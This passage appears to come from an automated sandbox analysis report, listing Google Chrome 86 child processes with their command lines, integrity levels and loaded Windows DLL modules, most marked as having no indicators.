c:\windows\system32\credssp.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\wpc.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\samlib.dll
c:\windows\system32\webio.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\srvcli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\devobj.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\winspool.drv
c:\windows\system32\samcli.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\winsta.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\secur32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\duser.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\wbemcomn2.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\imageres.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\slc.dll
c:\windows\system32\cscui.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dui70.dll
c:\windows\system32\mscms.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\mf.dll
c:\windows\system32\avrt.dll
c:\windows\system32\mfreadwrite.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\atl.dll
c:\windows\system32\wship6.dll
c:\windows\system32\bthprops.cpl

PID
3860
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=86.0.4240.198 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x717cd988,0x717cd998,0x717cd9a4
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winmm.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sechost.dll
c:\windows\system32\usp10.dll

PID
3812
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1064 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\rpcrt4.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\nsi.dll
c:\windows\system32\webio.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\userenv.dll
c:\windows\system32\winspool.drv
c:\windows\system32\profapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\ole32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dxgi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\slc.dll
c:\windows\system32\evr.dll
c:\windows\system32\dxva2.dll
c:\windows\system32\avrt.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\d3d9.dll
c:\program files\google\chrome\application\86.0.4240.198\libegl.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\atl.dll
c:\windows\system32\d3d11.dll
c:\windows\system32\ksuser.dll
c:\program files\google\chrome\application\86.0.4240.198\libglesv2.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\mf.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\d3d8thk.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\d3dcompiler_47.dll

PID
3552
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1336 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\rpcrt4.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\lpk.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\webio.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dnsapi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\wship6.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\ntmarta.dll

PID
2332
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctf.dll
c:\windows\system32\gdi32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\lpk.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\psapi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\winspool.drv
c:\windows\system32\webio.dll
c:\windows\system32\dwrite.dll

PID
3372
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\kernel32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\version.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\usp10.dll
c:\windows\system32\secur32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shell32.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\userenv.dll
c:\windows\system32\webio.dll
c:\windows\system32\winspool.drv
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\cryptbase.dll

PID
3728
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:1
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\user32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msctf.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\shlwapi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\psapi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\webio.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\iphlpapi.dll

PID
3680
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1152 /prefetch:2
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\imm32.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctf.dll
c:\windows\system32\gdi32.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\advapi32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\sechost.dll
c:\windows\system32\lpk.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\winmm.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\mf.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\nsi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\ole32.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\winspool.drv
c:\windows\system32\webio.dll
c:\windows\system32\avrt.dll
c:\windows\system32\setupapi.dll
c:\program files\google\chrome\application\86.0.4240.198\swiftshader\libglesv2.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\slc.dll
c:\windows\system32\msmpeg2vdec.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\evr.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\d3dcompiler_47.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\dxva2.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\atl.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\powrprof.dll
c:\program files\google\chrome\application\86.0.4240.198\swiftshader\libegl.dll
c:\windows\system32\bcrypt.dll

PID
1176
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\lpk.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winmm.dll
c:\windows\system32\version.dll
c:\windows\system32\shell32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\uiautomationcore.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\psapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\webio.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\dhcpcsvc.dll

PID
3532
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3036 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
LOW
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\msctf.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\iphlpapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\winmm.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ole32.dll
c:\windows\system32\psapi.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\webio.dll
c:\windows\system32\version.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\winspool.drv
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\cryptbase.dll

PID
516
CMD
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1040,18049422143475583637,16882731536220538851,131072 --enable-features=PasswordImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3328 /prefetch:8
Path
C:\Program Files\Google\Chrome\Application\chrome.exe
Indicators
No indicators
Parent process
chrome.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Google LLC
Description
Google Chrome
Version
86.0.4240.198
Modules
Image
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\version.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\user32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\sechost.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome_elf.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\iphlpapi.dll
c:\program files\google\chrome\application\86.0.4240.198\chrome.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\webio.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\dwrite.dll
c:\windows\system32\nsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\secur32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\psapi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\wbemcomn2.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\cscui.dll
c:\windows\system32\slc.dll
c:\windows\system32\mscms.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\mfreadwrite.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\mf.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\atl.dll
c:\windows\system32\avrt.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\mfplat.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\ksuser.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\netutils.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\winsta.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\samlib.dll
c:\windows\system32\wship6.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\firewallapi.dll
c:\windows\system32\credssp.dll
c:\windows\system32\samcli.dll
c:\windows\system32\wpc.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\cryptext.dll
c:\windows\system32\colorui.dll
c:\windows\system32\stobject.dll
c:\program files\windows sidebar\sbdrop.dll
c:\program files\microsoft office\office14\visshe.dll
c:\program files\winrar\rarext.dll
c:\program files\common files\microsoft shared\ime14\imejp\imjptip.dll
c:\windows\system32\bthprops.cpl
c:\windows\system32\webcheck.dll
